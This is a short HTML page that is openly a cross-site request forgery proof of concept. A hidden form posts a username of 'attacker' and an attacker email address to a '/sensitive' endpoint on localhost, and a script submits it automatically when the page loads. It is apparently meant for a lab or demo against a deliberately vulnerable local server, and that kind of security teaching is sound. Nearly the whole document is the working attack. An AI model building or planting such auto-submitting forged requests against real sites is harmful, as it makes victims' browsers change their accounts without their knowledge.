<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSRF Attack</title>
</head>
<body>
  <h1>CSRF Attack Page</h1>
  <p>This page will perform a CSRF attack on the vulnerable server.</p>
  <form action="http://localhost:8000/sensitive" method="POST" id="csrfForm">
    <input type="hidden" name="username" value="attacker">
    <input type="hidden" name="email" value="attacker@example.com">
  </form>
  <script>
    // Automatically submit the form when the page loads
    document.getElementById('csrfForm').submit();
  </script>
</body>
</html>
